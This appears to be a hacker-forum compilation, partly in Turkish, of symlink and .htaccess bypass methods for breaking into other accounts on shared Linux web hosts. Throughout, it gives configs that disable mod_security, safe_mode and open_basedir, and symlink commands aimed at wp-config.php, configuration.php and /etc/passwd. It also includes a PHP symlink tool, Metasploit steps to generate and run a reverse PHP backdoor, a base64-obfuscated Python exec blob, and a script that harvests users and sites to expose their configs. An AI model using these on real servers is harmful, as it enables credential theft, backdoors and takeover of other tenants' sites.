Tüm Linux Win Server ByPass Symlink Htaccess Yöntemleri

<Directory "/home/user/public_html">
Options -ExecCGI
AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
</Directory>

OPTIONS  Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .pl
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All

python shell , CGI PERL Shell
and .htaccess
the htaccess code is
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
===============
what we should do ?
just open the cgi bypass shell
and do sym
ln -s /home/user/public_html/wp-config.php 1.txt
then
cat 1.txt

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
DirectoryIndex new
DirectoryIndex config.ini

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

wew.shtml
do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
.htaccess
Options +FollowSymLinks
DirectoryIndex chesss.html
RemoveHandler .php
AddType application/octet-stream .php

.htaccess
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType root .root
AddHandler cgi-script .root
AddHandler cgi-script .root
php.ini
safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On
ln -s / CoderSec

.htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All

A good way to bypass forbidden error when reading passwd file
The general approach:


ln -s / etc / passwd passwd.txt

Well, open the passwd file The forbidden error encountered
for bypass=>

To bypass coming from one of the following two commands are used:
Code: (Select All)
ln -s /etc/passwd README
ln -s /etc/passwd HEADER
The second command will run in a directory And when we go back to the directory where the file will be shown passwd us.
SPT to b0x

Bypass Symlink (Priv8)
How you can bypass Symlink in linux webserver ?

1/ Create a folder

2/ Upload inside

".htaccess"
  
CODE:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

3/ Bypass manually

ln -s /home/user/public_html/t0ph4cking.txt

Bypass Symlink 403 Forbidden with .htaccess

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

Options Indexes FollowSymLinks
DirectoryIndex linuxsec.htm
AddType txt .php
AddHandler txt .php

<?php
/*
PHP 5.2.11/5.3.0 symlink() open_basedir bypass
by KingSkrupellos - Cyberizm Digital Security Team

CHUJWAMWMUZG
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

<? /*KingSkrupellos Symlink Bypass 404*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<title>Cyberizm SYM404</title><body bgcolor=silver><center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
rmdir("sl");mkdir("sl", 0777);$fl = $_POST['fl'];system("ln -s ".$fl." sl/x.txt");symlink($fl,"sl/x.txt");$anu = fopen("sl/.htaccess", "w");
fwrite($anu,"ReadmeName x.txt");
echo'<a href=sl/x.txt>CHECK</a>';
}

".htaccess":

#Bypass By Cyberizm.Org
<DIRECTORY /..../user/..../>
OPTIONS Indexes ExecCGI FollowSymLinks
AllowOverride All
</DIRECTORY>
AddType txt .php
AddHandler txt .php


"php.ini":

#Bypass By Cyberizm.Org
safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
register_globals = ON
exec = ON
shell_exec = ON

Bazen serverde  cgi telnet shell derken internal server error diye gıcık bir hata alırsınız bunun çözüm yolu çok olmakla birlikte en garanti çözüm yolu cpanel girip  MiME types bölümüne gelip ilk satıra

application/x-httpd-cgi

yı yazmak daha sonra ikinci satıra cgi shelinizin uzantısını yazmak mesela ali.veli şeklindeyse cgi sheliniz ikinci satıra veli yazıp okeylemek sonra broswere grip o cgi shelein olduğu adresi yenilemek tabi bu arada bu yenileme işlemini yapmadan önce ali.veli şeklindeki cgi shelimize chmod 755 vermeyi unutmayacaz

Öncelikle Serverimize CGI atmadan once Perl Kodlarımızı Açıyoruz Ve en başta olan

#!/usr/bin/perl -I/usr/local/bandmain yazıyoruz ve Serverimize upload ediyoruz.

Eğerki serverde tekrar hata oluyorsaniz Web Shell CGİ Denemenizi isterim

http://archive.is/UT8xf Buyrun burada

.htaccess code :
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
Options +ExecCGI
AddHandler cgi-script cgi pl wasRewriteEngine on
RewriteRule (.*)\.was$ $1.was

////////////////////SET UP BACKDOOR////////////////////
use payload/php/reverse_php
set LHOST [You Wan Ip] set LPORT 22
set ENCODER php/base64
generate -t raw

////////////////SET UP LISTENING/////////////////
use exploit/multi/handler
set LHOST [You Lan IP] set LPORT 22
set payload php/reverse_php
exploit

/////////////////// RUN BACKDOOR////////////////
php /home/yfnvpnvb/domains/quangcaonewstar.com/public_html/test.php
//////////////////CAT /ETC/PASSWD//////////////
cat /etc/passwd > passwd.txt
///////////////////CAT USER-DOMAIN/////////////
cat /etc/virtual/domainowners > domain.txt

#!/usr/bin/python
#-------------------------------------------------------------------------------
# Author:     KingSkrupellos
# WebSite    Cyberizm.Org
#-------------------------------------------------------------------------------
import base64;
exec(base64.b64decode('cHJpbnQgIiNvbWFucm9vdCINCnByaW50ICIjb20tcm9vdEBob3RtYWlsL​mNvbSINCnByaW50ICIjR3JlZXRzICwgQWxsIE9tYW5pIEFuZCBNdXNsaW0gR3JheWhhdCINCnB1dCA9I​HJhd19pbnB1dCgiRW50ZXIgdGhlIGZpbGUgeW91IHdhbnQgdG8gYnJvd3NlIGl0IDogIikgIyBIZXJlI​HRoZSBVc2VyIEVudGVyIGhpcyBmaWxlIHdhbnQgdG8gcHJvY2Nlc3MgaXQuDQp3b3JyID0gcmF3X2luc​HV0KCJOb3RpY2UgLCAgdGhlIG1vZGVzIHdpbGwgZXhlY3V0ZSBpcyB3cml0ZT13IHJlYWQ9ciAsLCBmb​3IgY29udGludWF0aW9uIHByZXNzIDxFbnRlcj4gOiIpICNoZXJlIHRoZSB1c2VyIGlmIGFjY2VwdCB0b​yB0aGUgZmlsZS4NCmlmIHdvcnIgPT0gJ3InIG9yICdyZWFkJyA6ICNoZXJlIHByb2Nlc3Mgb2YgcmVhZ​GluZw0KICAgIHJlYWQgPSBvcGVuKHB1dCwncicpDQogICAgZGF0YSA9IHJlYWQucmVhZCgpDQogICAgc​HJpbnQgZGF0YQ0KaWYgd29yciA9PSAndycgb3IgJ3dyaXRlJzogI2hlcmUgcHJvY2VzcyBvZiB3cml0Z​Q0KICAgIHdyaXRlID0gb3BlbihwdXQsJ3cnKQ0KICAgIHR4dCA9IHJhd19pbnB1dCgiRW50ZXIgdGhlI​HRleHQgeW91IHdhbnQgdG8gYWRkIHRvIHRoZSBmaWxlIE5vdGljZShBTEwgZGF0YSBvbiB0aGlzIGZpb​GUgeW91IHdpbGwgbG9zdCBpdCBcImlmIHlvdSBkb24ndCB3YW50IHBsZWFzZSBwcmVzcyBcJ0NUUkwrQ​1wnIFwiKSA6IikNCiAgICB3cml0ZS53cml0ZSh0eHQpDQogICAgcHJpbnQgImNoZWNrIHlvdXIgZmlsZ​SAsIGlmIGl0IHdhcyBkb25lIC4iDQplbHNlOg0KICAgIHByaW50ICJFcnJvciINCiAgICBleGl0KCkNC​g0KI0RvbmUgQnkgT21hbnJvb3Q='))

#!/usr/bin/env python
#Symlink Script by KingSkrupellos
#Creates Symlinks and makes a neat PHP index of sites in the dir "kidsymx"
#Version 1.1
#Minor fixes
#
#contact me @ Cyberizm Digital Security Team
#Cyberizm
import os,sys,re
if not os.path.exists('kidsymx'):
     os.makedirs('kidsymx')
os.chdir('kidsymx')
hta='Options Indexes FollowSymLinks\nDirectoryIndex kSym.php\nAddType txt .php\nAddHandler txt .php\n'
x=open('.htaccess','w')
x.write(hta)
x.close()
print '[+] htaccess created'
h="<html><head><title>kidSym</title>*********table,tr,td{padding: 7px 10px 7px 10px ; border: 1px solid black;} .menf{font-color:lime; font-size:11px; font-weight:bold;}</style></head><body bgcolor=#98FF98><center>
<h1>
kidSym</h1>
<p class=menf>
KingSkrupellos
greetz:Cyberizm Digital Security Team</p>
<table >"
os.system("ln -s / kid.txt")
if os.path.exists('kid.txt'):
print "[+] Symlink Created"
else:
print "[-] Unable to Create Symlink"
usrs=[]
sitesx=[]
z=open("/etc/passwd","r")
z=z.read()
z=re.findall('/home\w*?/\w+',z)
for usr in z:
     usrs.append(usr)

sites=os.listdir("/var/named/")
for site in sites:
     site=site.replace(".db","")
     sitesx.append(site)

#php making
path=os.getcwd()
if "/public_html/" in path:
path="/public_html/"
else:
path="/html/"
counter=1
indx=open("kSym.php","w")
indx.write(h)
for userx in usrs:
     for sitex in sitesx:
          u=userx.split("/",2)[2][0:5]
          s=sitex[0:5]
          if u==s:
               indx.write("
<tr><td style=font-family:calibri;font-weight:bold;color:grey;>%s</td><td style=font-family:calibri;font-weight:bold;color:red;>%s</td><td style=font-family:calibri;font-weight:bold;><a href="kid.txt%s%s" target="_blank">%s</a></td>"%(counter,userx.split("/",3)[2],userx,path,sitex))
               counter=counter+1
print "[+] Site index Complete"

print "[*] %s Sites found" %str(counter)

print "[+] Happy Hacking ./KingSkrupellos Cyberizm Digital Security Team"